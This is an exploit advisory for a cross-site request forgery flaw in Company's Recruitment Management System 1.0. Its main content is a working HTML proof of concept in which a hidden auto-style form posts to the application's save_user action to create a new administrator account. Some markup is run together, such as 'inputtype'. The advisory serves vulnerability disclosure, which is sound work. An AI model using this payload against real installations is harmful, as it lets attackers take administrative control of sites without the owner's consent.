# Exploit Title: Company's Recruitment Management System 1.0 - 'Add New user' Cross-Site Request Forgery (CSRF)# Date: 18-10-2021# Exploit Author: Aniket Anil Deshmane# Vendor Homepage: https://www.sourcecodester.com/php/14959/companys-recruitment-management-system-php-and-sqlite-free-source-code.html# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/employment_application.zip# Version: 1# Tested on: Windows 10,XAMPP
Detail:
The application isnot using any security token to prevent it against CSRF. Therefore, malicious user can add new administrator user account by using a crafted post request.
CSRF POC:-<html><!-- CSRF PoC - generated by Burp Suite Professional --><body><script>history.pushState('','','/')</script><form action="http://127.0.0.1/employment_application/Actions.php?a=save_user"
method="POST"><inputtype="hidden" name="id" value=""/><inputtype="hidden" name="fullname" value="Test"/><inputtype="hidden" name="username" value="Test"/><inputtype="hidden" name="type" value="1"/><inputtype="submit" value="Submit request"/></form></body></html>
